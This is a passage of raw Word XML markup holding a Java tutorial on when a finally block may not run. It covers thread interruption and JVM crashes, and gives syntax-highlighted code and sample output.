        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3458FE3D" w14:textId="77777777"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2112563"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Finally block was interrupted"</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551E32FD" w14:textId="77777777"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2112563"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02970308" w14:textId="77777777"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2112563"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765C0BB1" w14:textId="77777777"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2112563"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44397193" w14:textId="77777777"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2112563"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        thread</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>start</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC6F0F0" w14:textId="77777777"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2112563"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Thread</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sleep</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>100</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Wait for the thread to start execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D160D8A" w14:textId="77777777"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2112563"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        thread</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>interrupt</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Interrupt the thread during the execution of finally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021245C5" w14:textId="77777777"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2112563"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5885BE41" w14:textId="593C2AB5" w:rsidR="008A6D56" w:rsidRPr="008A6D56" w:rsidRDefault="008A6D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2112563"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E493E0" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00014A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utput:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A09BE70" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00014A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side try block</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DB7BCC" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00014A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nally block was interrupted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292901ED" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00014A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 the finally block is interrupted during execution, and the exception InterruptedException is caught, causing the block to exit prematurely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253B9925" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00014AA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If the JVM crashes (Fatal Errors)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6EF52F" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00014A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cases of a JVM crash or severe errors (such as OutOfMemoryError or StackOverflowError), the finally block may not be executed because the JVM itself is terminating abnormally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC0F6A0" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00014A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357B7040" w14:textId="77777777" w:rsidR="00994D39" w:rsidRPr="00994D39" w:rsidRDefault="00994D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6862656"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FinallyExample</w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8E2968" w14:textId="77777777" w:rsidR="00994D39" w:rsidRPr="00994D39" w:rsidRDefault="00994D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6862656"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> main</w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> args</w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D752AB" w14:textId="77777777" w:rsidR="00994D39" w:rsidRPr="00994D39" w:rsidRDefault="00994D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6862656"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>try</w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8B6CCC" w14:textId="77777777" w:rsidR="00994D39" w:rsidRPr="00994D39" w:rsidRDefault="00994D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6862656"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Inside try block"</w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D99F8E" w14:textId="77777777" w:rsidR="00994D39" w:rsidRPr="00994D39" w:rsidRDefault="00994D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6862656"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Simulating an error that causes the JVM to crash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CAF56F" w14:textId="77777777" w:rsidR="00994D39" w:rsidRPr="00994D39" w:rsidRDefault="00994D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6862656"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>throw</w:t>
      </w:r>
